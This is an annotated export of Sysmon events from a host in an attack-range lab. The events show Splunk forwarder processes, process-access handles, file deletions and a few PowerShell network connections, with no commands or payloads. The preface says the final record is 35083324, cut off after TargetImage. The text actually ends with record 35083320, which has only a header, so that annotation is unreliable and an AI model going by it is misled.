Sysmon events from channel Microsoft-Windows-Sysmon/Operational on win-host-987.attackrange.local, 2021-09-09 18:04:29 to 18:05:09 UTC, shown record by record in the order of the source export. Every record carries Level 4, Opcode 0, Keywords 0x8000000000000000, Task equal to the Event ID and RuleName -, so those are not repeated below. Schema versions in this capture: Event ID 1, 3 and 23 are version 5, Event ID 10 is version 3.

Reading notes:
- Event ID 10 GrantedAccess: 0x1fffff is PROCESS_ALL_ACCESS; 0x1400 is PROCESS_QUERY_INFORMATION (0x400) | PROCESS_QUERY_LIMITED_INFORMATION (0x1000); 0x101400 adds SYNCHRONIZE (0x100000). The 0x1fffff handles are the ones csrss.exe, conhost.exe and the parent splunkd.exe open on each Splunk child at the moment it is created; the 0x1400 handles are svchost.exe (lsm.dll in the call trace) querying sysmon64.exe with rights that include neither PROCESS_VM_WRITE nor PROCESS_CREATE_THREAD.
- Event ID 23 Archived "false - insufficient disk space": Sysmon did not keep a copy of the deleted file in its archive directory, so the hashes in the record are the only remaining artifact of the file.
- Where the export runs SourceProcessId and SourceThreadId together, the split shown agrees with the PIDs seen elsewhere in the capture (2076, 4716, 7004, 420); for conhost.exe (31443164) and svchost.exe (7325640) the splits 3144/3164 and 732/5640 are inferred.
- The last record (35083324) is cut off in the source after the start of TargetImage and is left as found.

Event ID 3 (NetworkConnect), RecordID 35083291, UtcTime 2021-09-09 18:04:54.199
  ProcessGuid {B81B27B7-401D-611D-6900-00000000C801}  ProcessId 3616  User NT AUTHORITY\SYSTEM
  Image C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe
  Protocol tcp  Initiated true  SourceIsIpv6 false  SourceIp 10.0.1.15  SourceHostname win-host-987.attackrange.local  SourcePort 56457  SourcePortName -
  DestinationIsIpv6 false  DestinationIp 10.0.1.12  DestinationHostname -  DestinationPort 8000  DestinationPortName -

Event ID 23 (FileDelete), RecordID 35083290, UtcTime 2021-09-09 18:04:29.373
  ProcessGuid {B81B27B7-4024-611D-7300-00000000C801}  ProcessId 2188  User NT AUTHORITY\SYSTEM
  Image C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
  TargetFilename C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security
  Hashes MD5=95A9DB9E63211794FF7273B8B834890A,SHA256=348694B5FBE218062F6F1EDA30DE85E1BB012EDEA3D2EA6BF71868605E54F4FB,IMPHASH=00000000000000000000000000000000
  IsExecutable false  Archived false - insufficient disk space

Event ID 23 (FileDelete), RecordID 35083289, UtcTime 2021-09-09 18:04:29.373
  ProcessGuid {B81B27B7-4024-611D-7300-00000000C801}  ProcessId 2188  User NT AUTHORITY\SYSTEM
  Image C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
  TargetFilename C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security
  Hashes MD5=A455D597D1F4ACF71ACDA51758849D9D,SHA256=CF923A29E0BF3F790F853E454E5CADA09A85EF7962C948BCCD759AC5AC49462B,IMPHASH=00000000000000000000000000000000
  IsExecutable false  Archived false - insufficient disk space

Event ID 23 (FileDelete), RecordID 35083288, UtcTime 2021-09-09 18:04:29.272
  ProcessGuid {B81B27B7-4024-611D-7300-00000000C801}  ProcessId 2188  User NT AUTHORITY\SYSTEM
  Image C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
  TargetFilename C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational
  Hashes MD5=228E2BA85009A84C0C72C2B51356F662,SHA256=AAD49DBE4AA34963694227BE449D9711D27F2825EA8B02CEEA842EEED3C7111C,IMPHASH=00000000000000000000000000000000
  IsExecutable false  Archived false - insufficient disk space

Event ID 10 (ProcessAccess), RecordID 35083287, UtcTime 2021-09-09 18:04:29.057
  Source {B81B27B7-4014-611D-3000-00000000C801}  SourceProcessId 3144  SourceThreadId 3164  SourceImage C:\Windows\system32\conhost.exe
  Target {B81B27B7-4CAD-613A-0B90-03000000C801}  TargetProcessId 6736  TargetImage C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
  GrantedAccess 0x1fffff
  CallTrace C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

Event ID 10 (ProcessAccess), RecordID 35083286, UtcTime 2021-09-09 18:04:29.057
  Source {B81B27B7-4012-611D-0C00-00000000C801}  SourceProcessId 732  SourceThreadId 5640  SourceImage C:\Windows\system32\svchost.exe
  Target {B81B27B7-4013-611D-2500-00000000C801}  TargetProcessId 1820  TargetImage C:\Windows\sysmon64.exe
  GrantedAccess 0x1400
  CallTrace C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

Event ID 10 (ProcessAccess), RecordID 35083285, UtcTime 2021-09-09 18:04:29.057
  Source {B81B27B7-4012-611D-0C00-00000000C801}  SourceProcessId 732  SourceThreadId 5640  SourceImage C:\Windows\system32\svchost.exe
  Target {B81B27B7-4013-611D-2500-00000000C801}  TargetProcessId 1820  TargetImage C:\Windows\sysmon64.exe
  GrantedAccess 0x1400
  CallTrace C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

Event ID 10 (ProcessAccess), RecordID 35083284, UtcTime 2021-09-09 18:04:29.057
  Source {B81B27B7-4012-611D-0C00-00000000C801}  SourceProcessId 732  SourceThreadId 5640  SourceImage C:\Windows\system32\svchost.exe
  Target {B81B27B7-4013-611D-2500-00000000C801}  TargetProcessId 1820  TargetImage C:\Windows\sysmon64.exe
  GrantedAccess 0x1400
  CallTrace C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

Event ID 10 (ProcessAccess), RecordID 35083283, UtcTime 2021-09-09 18:04:29.057
  Source {B81B27B7-4012-611D-0C00-00000000C801}  SourceProcessId 732  SourceThreadId 5640  SourceImage C:\Windows\system32\svchost.exe
  Target {B81B27B7-4013-611D-2500-00000000C801}  TargetProcessId 1820  TargetImage C:\Windows\sysmon64.exe
  GrantedAccess 0x1400
  CallTrace C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

Event ID 10 (ProcessAccess), RecordID 35083282, UtcTime 2021-09-09 18:04:29.057
  Source {B81B27B7-4012-611D-0500-00000000C801}  SourceProcessId 420  SourceThreadId 984  SourceImage C:\Windows\system32\csrss.exe
  Target {B81B27B7-4CAD-613A-0B90-03000000C801}  TargetProcessId 6736  TargetImage C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
  GrantedAccess 0x1fffff
  CallTrace C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f

Event ID 10 (ProcessAccess), RecordID 35083281, UtcTime 2021-09-09 18:04:29.057
  Source {B81B27B7-4013-611D-2700-00000000C801}  SourceProcessId 2076  SourceThreadId 3760  SourceImage C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
  Target {B81B27B7-4CAD-613A-0B90-03000000C801}  TargetProcessId 6736  TargetImage C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
  GrantedAccess 0x1fffff
  CallTrace C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

Event ID 1 (ProcessCreate), RecordID 35083280, UtcTime 2021-09-09 18:04:29.042
  ProcessGuid {B81B27B7-4CAD-613A-0B90-03000000C801}  ProcessId 6736  Image C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
  FileVersion 8.0.2  Description Network monitor  Product Splunk Application  Company Splunk Inc.  OriginalFileName splunk-netmon.exe
  CommandLine "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
  CurrentDirectory C:\Windows\system32\  User NT AUTHORITY\SYSTEM  LogonGuid {B81B27B7-4012-611D-E703-000000000000}  LogonId 0x3e7  TerminalSessionId 0  IntegrityLevel System
  Hashes MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC
  ParentProcessGuid {B81B27B7-4013-611D-2700-00000000C801}  ParentProcessId 2076  ParentImage C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe  ParentCommandLine "C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service

Event ID 23 (FileDelete), RecordID 35083292, UtcTime 2021-09-09 18:04:30.309
  ProcessGuid {B81B27B7-4024-611D-7300-00000000C801}  ProcessId 2188  User NT AUTHORITY\SYSTEM
  Image C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
  TargetFilename C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational
  Hashes MD5=EBAF6A5994319C898CDF40F3C8087872,SHA256=564A52ED8AFA87262EB403A5CC9ACB44C44661ED8ED6E46A9CFF2AB9BC5CEDBD,IMPHASH=00000000000000000000000000000000
  IsExecutable false  Archived false - insufficient disk space

Event ID 23 (FileDelete), RecordID 35083293, UtcTime 2021-09-09 18:04:31.339
  ProcessGuid {B81B27B7-4024-611D-7300-00000000C801}  ProcessId 2188  User NT AUTHORITY\SYSTEM
  Image C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
  TargetFilename C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational
  Hashes MD5=B1BF8696E436B14F4D67704D3D692F98,SHA256=5E8E6EABD7F113E207310AD39FDF10AB0B7B9CA381789AFD6F06981B295FA82C,IMPHASH=00000000000000000000000000000000
  IsExecutable false  Archived false - insufficient disk space

Event ID 23 (FileDelete), RecordID 35083295, UtcTime 2021-09-09 18:04:32.354
  ProcessGuid {B81B27B7-4024-611D-7300-00000000C801}  ProcessId 2188  User NT AUTHORITY\SYSTEM
  Image C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
  TargetFilename C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational
  Hashes MD5=A7772D5F654D8B91DA8E577ADC6E9445,SHA256=B74B65293CFAC2BFD20761F51950642F00B6D4F1EB015A2387EE0B8E83C81CBB,IMPHASH=00000000000000000000000000000000
  IsExecutable false  Archived false - insufficient disk space

Event ID 23 (FileDelete), RecordID 35083294, UtcTime 2021-09-09 18:04:32.054
  ProcessGuid {B81B27B7-4024-611D-7300-00000000C801}  ProcessId 2188  User NT AUTHORITY\SYSTEM
  Image C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
  TargetFilename C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational
  Hashes MD5=7577D29ECD4698ABF741F05313E04DEA,SHA256=B9887BC42DC19D419D1033AFAAC44C032CB7EA08672DE182883F4CCC867B7B0F,IMPHASH=00000000000000000000000000000000
  IsExecutable false  Archived false - insufficient disk space

Event ID 23 (FileDelete), RecordID 35083296, UtcTime 2021-09-09 18:04:33.386
  ProcessGuid {B81B27B7-4024-611D-7300-00000000C801}  ProcessId 2188  User NT AUTHORITY\SYSTEM
  Image C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
  TargetFilename C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational
  Hashes MD5=64844EA7FCDC81C807E8E8D19E4156EE,SHA256=19DFFDE1272158F9D51B7518CFCA88A07DFCA6B3E6B6E966E873D2C28B55EA15,IMPHASH=00000000000000000000000000000000
  IsExecutable false  Archived false - insufficient disk space

Event ID 23 (FileDelete), RecordID 35083298, UtcTime 2021-09-09 18:04:34.436
  ProcessGuid {B81B27B7-4024-611D-7300-00000000C801}  ProcessId 2188  User NT AUTHORITY\SYSTEM
  Image C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
  TargetFilename C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational
  Hashes MD5=E4F02AB61BFE989BD86E88E0F043553F,SHA256=C7EF8F0ACA30E4B87243826C4E0F53B6C157D55AF00BD29006DB1BB561B41B47,IMPHASH=00000000000000000000000000000000
  IsExecutable false  Archived false - insufficient disk space

Event ID 3 (NetworkConnect), RecordID 35083297, UtcTime 2021-09-09 18:04:56.997
  ProcessGuid {B81B27B7-4822-613A-788F-03000000C801}  ProcessId 6940  User ATTACKRANGE\REED_SCHMIDT
  Image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Protocol tcp  Initiated true  SourceIsIpv6 false  SourceIp 10.0.1.15  SourceHostname win-host-987.attackrange.local  SourcePort 56458  SourcePortName -
  DestinationIsIpv6 false  DestinationIp 10.0.1.16  DestinationHostname ip-10-0-1-16.us-west-2.compute.internal  DestinationPort 443  DestinationPortName https

Event ID 3 (NetworkConnect), RecordID 35083300, UtcTime 2021-09-09 18:05:00.070
  ProcessGuid {B81B27B7-401D-611D-6900-00000000C801}  ProcessId 3616  User NT AUTHORITY\SYSTEM
  Image C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe
  Protocol tcp  Initiated true  SourceIsIpv6 false  SourceIp 10.0.1.15  SourceHostname win-host-987.attackrange.local  SourcePort 56459  SourcePortName -
  DestinationIsIpv6 false  DestinationIp 10.0.1.12  DestinationHostname -  DestinationPort 8000  DestinationPortName -

Event ID 23 (FileDelete), RecordID 35083299, UtcTime 2021-09-09 18:04:35.452
  ProcessGuid {B81B27B7-4024-611D-7300-00000000C801}  ProcessId 2188  User NT AUTHORITY\SYSTEM
  Image C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
  TargetFilename C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational
  Hashes MD5=E9BA00F8C2C82D95E1D9C67C9A9DBE5B,SHA256=877B7D6658BA59B64AB1FBC1A03FF2B294A92B8F1A2BDCE2CF768FED851191F5,IMPHASH=00000000000000000000000000000000
  IsExecutable false  Archived false - insufficient disk space

Event ID 23 (FileDelete), RecordID 35083302, UtcTime 2021-09-09 18:04:36.468
  ProcessGuid {B81B27B7-4024-611D-7300-00000000C801}  ProcessId 2188  User NT AUTHORITY\SYSTEM
  Image C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
  TargetFilename C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational
  Hashes MD5=2C7854CA050420B0A51987AD9AE7B987,SHA256=9247D1ACBEAC8D904B8B781DA809F7C90C211B73B965D4FE76B70A29C4DC7E6C,IMPHASH=00000000000000000000000000000000
  IsExecutable false  Archived false - insufficient disk space

Event ID 23 (FileDelete), RecordID 35083301, UtcTime 2021-09-09 18:04:36.366
  ProcessGuid {B81B27B7-4012-611D-1100-00000000C801}  ProcessId 968  User NT AUTHORITY\LOCAL SERVICE
  Image C:\Windows\System32\svchost.exe
  TargetFilename C:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.dat
  Hashes MD5=2CAB9202E04C68F19ACC051E8B9D7CE0,SHA256=DDBE2989E663366F7DEB54277981B6EF7B8B14E22C44D7B82A0054C17DD02A70,IMPHASH=00000000000000000000000000000000
  IsExecutable false  Archived false - insufficient disk space

Event ID 23 (FileDelete), RecordID 35083303, UtcTime 2021-09-09 18:04:37.481
  ProcessGuid {B81B27B7-4024-611D-7300-00000000C801}  ProcessId 2188  User NT AUTHORITY\SYSTEM
  Image C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
  TargetFilename C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational
  Hashes MD5=E0C2AA6C7D4C929059008CD958A9B72E,SHA256=D65DC29CFD6859243AFAB66D95380030F7C9622FB98B25F7FFEF5BBFC91356CA,IMPHASH=00000000000000000000000000000000
  IsExecutable false  Archived false - insufficient disk space

Event ID 23 (FileDelete), RecordID 35083307, UtcTime 2021-09-09 18:04:38.498
  ProcessGuid {B81B27B7-4024-611D-7300-00000000C801}  ProcessId 2188  User NT AUTHORITY\SYSTEM
  Image C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
  TargetFilename C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational
  Hashes MD5=61B4A92880C189FC4415F42F1962A569,SHA256=99BA0F4B1FE84F89AB91C1710917EB0902BE12A124899563B8B09D2617E7D53C,IMPHASH=00000000000000000000000000000000
  IsExecutable false  Archived false - insufficient disk space

Event ID 23 (FileDelete), RecordID 35083306, UtcTime 2021-09-09 18:04:38.380
  ProcessGuid {B81B27B7-5BF5-611D-6D04-00000000C801}  ProcessId 5004  User ATTACKRANGE\REED_SCHMIDT
  Image C:\Program Files\Mozilla Firefox\firefox.exe
  TargetFilename C:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm
  Hashes MD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000
  IsExecutable false  Archived false - insufficient disk space

Event ID 23 (FileDelete), RecordID 35083305, UtcTime 2021-09-09 18:04:38.380
  ProcessGuid {B81B27B7-5BF5-611D-6D04-00000000C801}  ProcessId 5004  User ATTACKRANGE\REED_SCHMIDT
  Image C:\Program Files\Mozilla Firefox\firefox.exe
  TargetFilename C:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm
  Hashes MD5=BF1BCB3220F3953EE34FBAB56DE179A3,SHA256=641F4FAEB140B868224A102F2501E3DDC4923F20F98ECDD9D2C07568B5FA35B6,IMPHASH=00000000000000000000000000000000
  IsExecutable false  Archived false - insufficient disk space

Event ID 23 (FileDelete), RecordID 35083304, UtcTime 2021-09-09 18:04:38.033
  ProcessGuid {B81B27B7-4024-611D-7300-00000000C801}  ProcessId 2188  User NT AUTHORITY\SYSTEM
  Image C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
  TargetFilename C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational
  Hashes MD5=E427E882B858394F0E3CF600B8F108E2,SHA256=3D6591F41001DB30C9E6EA0340B356F51F4DC053064AE3737C715A82811C841A,IMPHASH=00000000000000000000000000000000
  IsExecutable false  Archived false - insufficient disk space

Event ID 23 (FileDelete), RecordID 35083309, UtcTime 2021-09-09 18:04:39.516
  ProcessGuid {B81B27B7-4024-611D-7300-00000000C801}  ProcessId 2188  User NT AUTHORITY\SYSTEM
  Image C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
  TargetFilename C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational
  Hashes MD5=F459EA3179CBB8E749E93CC1261B14F3,SHA256=3AB063C5698DBC60774FF06363E476A3CE76ED5E2FB840E33E8EEF624A46A67C,IMPHASH=00000000000000000000000000000000
  IsExecutable false  Archived false - insufficient disk space

Event ID 3 (NetworkConnect), RecordID 35083308, UtcTime 2021-09-09 18:05:03.008
  ProcessGuid {B81B27B7-4822-613A-788F-03000000C801}  ProcessId 6940  User ATTACKRANGE\REED_SCHMIDT
  Image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Protocol tcp  Initiated true  SourceIsIpv6 false  SourceIp 10.0.1.15  SourceHostname win-host-987.attackrange.local  SourcePort 56460  SourcePortName -
  DestinationIsIpv6 false  DestinationIp 10.0.1.16  DestinationHostname ip-10-0-1-16.us-west-2.compute.internal  DestinationPort 443  DestinationPortName https

Event ID 23 (FileDelete), RecordID 35083310, UtcTime 2021-09-09 18:04:40.531
  ProcessGuid {B81B27B7-4024-611D-7300-00000000C801}  ProcessId 2188  User NT AUTHORITY\SYSTEM
  Image C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
  TargetFilename C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational
  Hashes MD5=41C33B5D980103B25762EA910194F124,SHA256=D62FD8D78FC1216DC5E4CB29C225111EBFCB1A1CADCCC07D41AC17CF788B97E9,IMPHASH=00000000000000000000000000000000
  IsExecutable false  Archived false - insufficient disk space

Event ID 23 (FileDelete), RecordID 35083312, UtcTime 2021-09-09 18:04:41.546
  ProcessGuid {B81B27B7-4024-611D-7300-00000000C801}  ProcessId 2188  User NT AUTHORITY\SYSTEM
  Image C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
  TargetFilename C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational
  Hashes MD5=940D8DEC6F53CB56099AF4B0695A8C35,SHA256=1A9F70960BF7D79A8D3EFCC5B6EC8E67FBD7806C019C164C87F10FAA9B50A362,IMPHASH=00000000000000000000000000000000
  IsExecutable false  Archived false - insufficient disk space

Event ID 3 (NetworkConnect), RecordID 35083311, UtcTime 2021-09-09 18:05:05.090
  ProcessGuid {B81B27B7-401D-611D-6900-00000000C801}  ProcessId 3616  User NT AUTHORITY\SYSTEM
  Image C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe
  Protocol tcp  Initiated true  SourceIsIpv6 false  SourceIp 10.0.1.15  SourceHostname win-host-987.attackrange.local  SourcePort 56461  SourcePortName -
  DestinationIsIpv6 false  DestinationIp 10.0.1.12  DestinationHostname -  DestinationPort 8000  DestinationPortName -

Event ID 23 (FileDelete), RecordID 35083313, UtcTime 2021-09-09 18:04:42.560
  ProcessGuid {B81B27B7-4024-611D-7300-00000000C801}  ProcessId 2188  User NT AUTHORITY\SYSTEM
  Image C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe
  TargetFilename C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational
  Hashes MD5=1C06C8142527E01D863B34D54B0E35CD,SHA256=AB58E3CC88C321815677A1AC4333E520AF454633C95B7B162C76C0208EBDB7D7,IMPHASH=00000000000000000000000000000000
  IsExecutable false  Archived false - insufficient disk space

Event ID 10 (ProcessAccess), RecordID 35083322, UtcTime 2021-09-09 18:04:43.859
  Source {B81B27B7-4014-611D-3000-00000000C801}  SourceProcessId 3144  SourceThreadId 3164  SourceImage C:\Windows\system32\conhost.exe
  Target {B81B27B7-4CBB-613A-0C90-03000000C801}  TargetProcessId 7004  TargetImage C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
  GrantedAccess 0x1fffff
  CallTrace C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

Event ID 10 (ProcessAccess), RecordID 35083321, UtcTime 2021-09-09 18:04:43.859
  Source {B81B27B7-4012-611D-0C00-00000000C801}  SourceProcessId 732  SourceThreadId 5640  SourceImage C:\Windows\system32\svchost.exe
  Target {B81B27B7-4013-611D-2500-00000000C801}  TargetProcessId 1820  TargetImage C:\Windows\sysmon64.exe
  GrantedAccess 0x1400
  CallTrace C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

Event ID 10 (ProcessAccess), RecordID 35083320, UtcTime 2021-09-09 18:04:43.859
